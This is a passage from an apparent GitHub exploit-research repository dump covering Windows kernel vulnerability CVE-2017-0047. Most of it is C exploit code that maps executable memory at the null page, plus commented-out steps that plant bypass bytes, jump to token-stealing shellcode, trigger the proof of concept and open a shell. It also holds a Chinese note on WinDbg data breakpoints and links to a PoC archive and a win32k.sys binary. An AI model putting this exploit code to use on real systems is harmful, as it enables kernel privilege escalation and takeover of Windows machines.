VirtualMemory_Result = NtAllocateVirtualMemory(hProcess, 40 | (LPVOID*)&Virtual_BaseAddr, 41 | 0, 42 | &RegionSize, 43 | MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, 44 | PAGE_EXECUTE_READWRITE); 45 | if (VirtualMemory_Result != 0x0) 46 | printf(" [!] Failed to allocate memory at BaseAddress, error: 0x%X\n", VirtualMemory_Result); 47 | else { 48 | printf(" [*] Allocated memory at BaseAddress"); 49 | } 50 | memset(0x0, 0, 0x1000); 51 | 52 | // void* bypass_one = (void *)0x590; 53 | // *(LPBYTE)bypass_one = 0x1; 54 | // void* bypass_two = (void *)0x592; 55 | // *(LPBYTE)bypass_two = 0x1; 56 | // void* jump_addr = (void *)0x748; 57 | // *(LPDWORD)jump_addr = (DWORD)TokenStealingShellcodeWin7; 58 | // Trigger_BSoDPoc(); 59 | // PopShell(); 60 | return 0; 61 | } -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2017-0047/know.md: -------------------------------------------------------------------------------- 1 | ba e1 0x93ccedcd 2 | 3 | ## ba 4 | 5 | ba 命令就是针对数据下断点的命令, 该断点在指定内存被访问时触发。 命令格式为 6 | 7 | ba Access Size [地址] 8 | 9 | Access 是访问的方式, 比如 e (执行), r (读/写), w (写) 10 | 11 | Size 是监控访问的位置的大小,以字节为单位。 值为 1、2或4,还可以是 8(64位机)。 -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2017-0047/poc.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2017-0047/poc.zip -------------------------------------------------------------------------------- /Windows Kernel Vulnerability/CVE-2017-0047/win32k.sys: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zzcentury/Exploit-Re/a284812020ad8a7a8b55a23cd6d06c43f0d9efdc/Windows Kernel Vulnerability/CVE-2017-0047/win32k.sys 
--------------------------------------------------------------------------------